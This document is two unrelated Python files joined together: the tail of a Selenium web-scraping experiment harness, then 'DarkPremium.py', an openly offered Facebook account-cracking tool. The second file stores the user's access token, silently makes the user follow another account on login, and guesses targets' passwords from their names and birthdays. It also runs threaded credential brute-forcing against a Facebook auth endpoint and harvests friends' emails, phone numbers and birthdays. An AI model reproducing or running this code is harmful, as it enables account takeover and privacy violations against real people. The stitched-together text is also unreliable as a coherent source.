runScrapingProgramHelper(driver, progId, optionsStr)
return driver
def runScrapingProgramHelper(driver, progId, optionsStr):
driver.execute_script("RecorderUI.loadSavedProgram(" + str(progId) + ");")
runCurrentProgramJS = """
function repeatUntilReadyToRun(){
console.log("repeatUntilReadyToRun");
if (!ReplayScript.prog){
setTimeout(repeatUntilReadyToRun, 100);
}
else{
ReplayScript.prog.run(""" + optionsStr + """);
}
}
repeatUntilReadyToRun();
"""
driver.execute_script(runCurrentProgramJS)
def blockingRepeatUntilNonFalseAnswer(lam):
ans = lam()
while (not ans):
time.sleep(1)
ans = lam()
return ans
def getDatasetIdForDriver(driver):
getDatasetId = lambda : driver.execute_script("console.log('datasetsScraped', datasetsScraped); if (datasetsScraped.length > 0) {console.log('realAnswer', datasetsScraped[0]); return datasetsScraped[0];} else { return false;}")
return blockingRepeatUntilNonFalseAnswer(getDatasetId)
def getWhetherDone(driver):
getHowManyDone = lambda: driver.execute_script("console.log('scrapingRunsCompleted', scrapingRunsCompleted); if (scrapingRunsCompleted === 0) {return false;} else {return scrapingRunsCompleted}")
return blockingRepeatUntilNonFalseAnswer(getHowManyDone)
class RunProgramProcess(Process):
def __init__(self, allDatasets, i, profile, programId, optionStr, numTriesSoFar=0):
super(RunProgramProcess,self).__init__()
self.allDatasets = allDatasets
self.profile = profile
self.programId = programId
self.optionStr = optionStr
self.numTriesSoFar = numTriesSoFar
self.driver = newDriver(self.profile)
# below is bad, but I'm going to do it anyway for time being
#self.driver = runScrapingProgram(self.profile, self.programId, self.optionStr)
def run(self):
self.runInternals()
def runInternals(self):
try:
print self.optionStr
runScrapingProgramHelper(self.driver, self.programId, self.optionStr)
datasetId = getDatasetIdForDriver(self.driver)
print self.programId, datasetId
self.allDatasets.put(datasetId)
done = getWhetherDone(self.driver)
print self.programId, done
self.driver.close()
self.driver.quit()
except Exception as e:
# assume we can just recover by trying again
if (self.numTriesSoFar < 3):
self.numTriesSoFar += 1
self.runInternals()
else:
logging.error(traceback.format_exc())
def terminate(self):
try:
if (self.driver):
self.driver.close()
self.driver.quit()
except: # catch *all* exceptions
print "tried to close driver but no luck. probably already closed"
super(RunProgramProcess, self).terminate()
"""
def entityScopeVsNoEntityScopeFirstRunExperiment(programIdsLs):
for programId in programIdsLs:
allDatasets = Queue()
p1 = RunProgramProcess(allDatasets,"1",programId,'{}')
p2 = Process(target=runProgramThread, args=(allDatasets,"2",programId,'{ignoreEntityScope: true}'))
d1 = p1.start()
d2 = p2.start()
p1.join()
p2.join()
print "------"
print allDatasets
for datasetId in allDatasets:
print "kaofang.cs.berkeley.edu:8080/downloaddetailed/" + str(datasetId)
"""
def joinProcesses(procs, timeoutInSeconds):
pnum = len(procs)
bool_list = [True]*pnum
start = time.time()
while time.time() - start <= timeoutInSeconds:
for i in range(pnum):
bool_list[i] = procs[i].is_alive()
if np.any(bool_list):
time.sleep(1)
else:
print "time to finish: ", time.time() - start
return True
else:
print "timed out, killing all processes", time.time() - start
for p in procs:
p.terminate()
p.join()
return False
def oneConfigRun(programId, i, j, allDatasetsAllIterations, simulatedErrorLocs):
noErrorsRunComplete = False
allDatasets = None
while (not noErrorsRunComplete):
allDatasets = Queue()
errorLoc = simulatedErrorLocs[programId][i]
simulateErrorIndexesStr = str(errorLoc)
print simulateErrorIndexesStr
p2 = RunProgramProcess(allDatasets,2, "2",programId,'{nameAddition: "+escope+loc'+str(i)+'+run'+str(j)+'", simulateError:'+ simulateErrorIndexesStr + '}') # our recovery strategy
p3 = RunProgramProcess(allDatasets,3, "3",programId,'{nameAddition: "+ideal+loc'+str(i)+'+run'+str(j)+'"}') # the perfect ideal recovery strategy, won't encounter simulated error
p4 = RunProgramProcess(allDatasets,4, "4",programId,'{nameAddition: "+ideal+loc'+str(i)+'+run'+str(j)+'", ignoreEntityScope: true}') # an alternative perfect ideal recovery strategy, won't encounter simulated error, but also won't use entityScope
p1 = RunProgramProcess(allDatasets,1, "1",programId,'{nameAddition: "+naive+loc'+str(i)+'+run'+str(j)+'", ignoreEntityScope: true, simulateError:'+ simulateErrorIndexesStr + '}') # naive recovery strategy
procs = [p2,p3,p4,p1]
for p in procs:
time.sleep(3) # don't overload; also, wait for thing to load
p.start()
# below will be true if all complete within the time limit, else false
noErrorsRunComplete = joinProcesses(procs, 4000)
print "------"
f = open("recoveryDatasetUrls.txt", "a")
for i in range(4):
newDatasetId = allDatasets.get()
allDatasetsAllIterations.append(newDatasetId)
f.write("kaofang.cs.berkeley.edu:8080/downloaddetailedmultipass/" + str(newDatasetId) + "\n")
f.close()
for datasetId in allDatasetsAllIterations:
print "kaofang.cs.berkeley.edu:8080/downloaddetailedmultipass/" + str(datasetId)
print "------"
def recoveryExperiment(programIdsLs, simulatedErrorLocs, rounds):
allDatasetsAllIterations = []
for programId in programIdsLs:
for j in range(rounds): # do three runs
for i in range(len(simulatedErrorLocs[programId])):
oneConfigRun(programId, i, j, allDatasetsAllIterations, simulatedErrorLocs)
def shortRecoveryTest(programIdsLs, simulatedErrorLocs):
allDatasetsAllIterations = []
for programId in programIdsLs:
oneConfigRun(programId, 0, 0, allDatasetsAllIterations, simulatedErrorLocs)
def main():
programIds = [\
#145, \
#152 \
#138, \
#128, \
#143, \
#151, \
#149, \
#154,
#155
#158,
#155,
159
]
simulatedErrorLocs = {
128: [[27], [54], [81]], # community foundations
#143: [[1,525], [2,350], [3,175]], # old twitter
155: [[2,100],[3,200],[4,300]], # new twitter
138: [[10], [20], [30]], # craigslist
#149: [[1, 1903], [1, 3805], [7, 1005]], # old yelp reviews
154: [[4,225], [8,150], [12,75]], # new yelp reviews
#145: [[10], [20], [30]], # yelp restaurant features
145: [[10]], # yelp restaurant features the correction run
158: [[10,20],[20,4],[30,7]], # yelp menu items
159: [[10,20],[20,4],[30,7]], # yelp menu items (the mac version)
#152: [[13],[25],[37]] # zimride listings
152: [[8]] # zimride correction run
}
recoveryExperiment(programIds, simulatedErrorLocs, 3)
#shortRecoveryTest(programIds, simulatedErrorLocs)
main()
|
DarkPremium.py | # -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium v1.8\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;96m MUHAMAD BADRU WASIH \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mSupport \x1b[1;91m: \x1b[1;92m \x1b[92mLimit[Zart] |./Badru |Wasih \x1b[ \x1b[1;97m║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92\x1b[92mhttps://github.com/Badru-CyberArmy \x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://www.youtube.com/channel/UCc3ktJXzCcNfEo8q5t2lVAg')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.youtube.com/channel/UCc3ktJXzCcNfEo8q5t2lVAg')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
